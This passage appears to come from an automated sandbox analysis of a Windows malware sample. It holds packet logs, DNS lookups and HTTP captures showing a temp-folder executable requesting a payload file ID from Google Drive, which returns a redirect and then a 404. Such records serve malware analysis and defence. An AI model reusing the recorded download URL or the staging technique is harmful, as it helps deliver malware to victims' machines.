                                                                                                      Jan 11, 2025 00:50:25.012926102 CET44349990142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.012974977 CET49990443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:25.012996912 CET44349990142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.013014078 CET49990443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:25.013015032 CET44349990142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.013040066 CET49990443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:25.013067961 CET49990443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:25.013778925 CET49990443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:25.013799906 CET44349990142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.147931099 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.147990942 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.148081064 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.148374081 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.148386955 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.793128014 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.793216944 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.793857098 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.793920994 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.795684099 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.795707941 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.796011925 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:25.796071053 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.796461105 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:25.839340925 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.188328028 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.188452959 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:26.188646078 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:26.188710928 CET44349991216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.188774109 CET49991443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:26.199744940 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:26.199780941 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.199846983 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:26.200129032 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:26.200139999 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.855259895 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.855349064 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:26.855737925 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:26.855747938 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:26.855931997 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:26.855938911 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307244062 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307326078 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.307339907 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307354927 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307377100 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.307382107 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307404995 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.307439089 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.307441950 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307465076 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.307476044 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.307503939 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.308221102 CET49992443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:27.308237076 CET44349992142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.424391985 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:27.424448967 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:27.424778938 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:27.424814939 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:27.424820900 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.085565090 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.085686922 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.086323023 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.086395025 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.088138103 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.088152885 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.088388920 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.088543892 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.088917971 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.131329060 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.469578028 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.469728947 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.469741106 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.469795942 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.469907999 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.469937086 CET44349993216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.469985008 CET49993443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:28.481662035 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:28.481708050 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:28.481784105 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:28.482000113 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:28.482012033 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.136876106 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.137001991 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:29.137558937 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:29.137564898 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.137749910 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:29.137756109 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.561389923 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.561455965 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.561516047 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.561629057 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:29.562374115 CET49994443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:29.562391043 CET44349994142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.690443993 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:29.690496922 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:29.690571070 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:29.690916061 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:29.690931082 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.325453997 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.325548887 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.326244116 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.326350927 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.328013897 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.328021049 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.328269005 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.328444958 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.328687906 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.375332117 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.717482090 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.717557907 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.717580080 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.717631102 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.717736959 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.717782974 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.717969894 CET44349995216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.718009949 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.718009949 CET49995443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:30.742722034 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:30.742768049 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:30.742835045 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:30.743143082 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:30.743158102 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.387238979 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.387299061 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.387787104 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.387797117 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.388046026 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.388052940 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.822140932 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.822181940 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.822319031 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.822370052 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.822418928 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.822438955 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.822474957 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.822489977 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.822526932 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.823270082 CET49996443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:31.823291063 CET44349996142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.940335035 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:31.940403938 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:31.940551996 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:31.940915108 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:31.940931082 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:32.685317039 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:32.685400009 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:32.686131001 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:32.686189890 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:32.687788010 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:32.687796116 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:32.688098907 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:32.688297033 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:32.688955069 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:32.735325098 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:33.077385902 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:33.077512980 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:33.077548981 CET44349997216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:33.077601910 CET49997443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.205554962 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.205562115 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.205735922 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.205741882 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643047094 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643102884 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643160105 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.643171072 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.643194914 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.643234968 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.644073963 CET50008443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:45.644093037 CET44350008142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.768207073 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.768266916 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:45.768364906 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.768618107 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:45.768637896 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.425451994 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.425590992 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.426233053 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.426294088 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.427736998 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.427747011 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.427990913 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.428055048 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.428324938 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.475336075 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.819884062 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.819997072 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.820039988 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.820090055 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.820486069 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.820519924 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.820553064 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.820574045 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.826643944 CET50009443192.168.2.7216.58.206.46
                                                                                                      Jan 11, 2025 00:50:46.826677084 CET44350009216.58.206.46192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.838766098 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:46.838807106 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:46.838916063 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:46.839118004 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:46.839132071 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.471735001 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.471874952 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.472374916 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.472387075 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.472541094 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.472558022 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905451059 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905519962 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.905529976 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905575037 CET50010443192.168.2.7142.250.181.225
                                                                                                      Jan 11, 2025 00:50:47.905585051 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905590057 CET44350010142.250.181.225192.168.2.7
                                                                                                      Jan 11, 2025 00:50:47.905633926 CET50010443192.168.2.7142.250.181.225
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 00:49:58.901803017 CET | 60465 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 00:49:58.909946918 CET | 53 | 60465 | 1.1.1.1 | 192.168.2.7
Jan 11, 2025 00:50:00.520577908 CET | 61324 | 53 | 192.168.2.7 | 1.1.1.1
Jan 11, 2025 00:50:00.528120995 CET | 53 | 61324 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 00:49:58.901803017 CET | 192.168.2.7 | 1.1.1.1 | 0x4ab9 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 11, 2025 00:50:00.520577908 CET | 192.168.2.7 | 1.1.1.1 | 0x6824 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 00:48:38.475827932 CET | 1.1.1.1 | 192.168.2.7 | 0x5623 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 00:48:38.475827932 CET | 1.1.1.1 | 192.168.2.7 | 0x5623 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 00:49:58.909946918 CET | 1.1.1.1 | 192.168.2.7 | 0x4ab9 | No error (0) | drive.google.com | | 216.58.206.46 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 00:50:00.528120995 CET | 1.1.1.1 | 192.168.2.7 | 0x6824 | No error (0) | drive.usercontent.google.com | | 142.250.181.225 | A (IP address) | IN (0x0001) | false
                                                                                                      • drive.google.com
                                                                                                      • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49969 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:50:00 UTC | 216 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
2025-01-10 23:50:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:00 GMT
                                                                                                      Location: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-Xud6vnwMag4tASp5LADmRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Server: ESF
                                                                                                      Content-Length: 0
                                                                                                      X-XSS-Protection: 0
                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49970 | 142.250.181.225 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:50:01 UTC | 258 | OUT | GET /download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: drive.usercontent.google.com
                                                                                                      Connection: Keep-Alive
2025-01-10 23:50:01 UTC | 2227 | IN | HTTP/1.1 404 Not Found
                                                                                                      X-GUploader-UploadID: AFIdbgRLVVHvRjh54fH2-gt35XPbgdTelw0Mc8ZLRCV9Ssh1c3kr2Wv6Xn0SUyZQjkuZ4zww
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                      Date: Fri, 10 Jan 2025 23:50:01 GMT
                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                      Content-Security-Policy: script-src 'nonce-nsG67Q5cynzGTl6ANojSkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                      Content-Length: 1652
                                                                                                      Server: UploadServer
                                                                                                      Set-Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE; expires=Sat, 12-Jul-2025 23:50:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                      Connection: close
2025-01-10 23:50:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9YIBQLsx2uJ4BSmeprzK4g">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49971 | 216.58.206.46 | 443 | 5912 | C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 23:50:02 UTC | 426 | OUT | GET /uc?export=download&id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                      Host: drive.google.com
                                                                                                      Cache-Control: no-cache
                                                                                                      Cookie: NID=520=V6MDbDdmBBfTI7wi225z_j7TZyDNjWU74kmeNCQsNiblTjWRc4Mu5JON2RiZcuFOOxnGyG_SSY3Waq3RBMprjf_8oFvLztOIshZYf1lihO2shPJH8wrYxKO04hxfLJ3eD1iiOm1Em8vndvH2AZj3aW6PLgj5AUPZkgwAx3DaTUcOLW1SwEBnGNvzWspCmGGE
2025-01-10 23:50:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                                      Content-Type: application/binary
                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
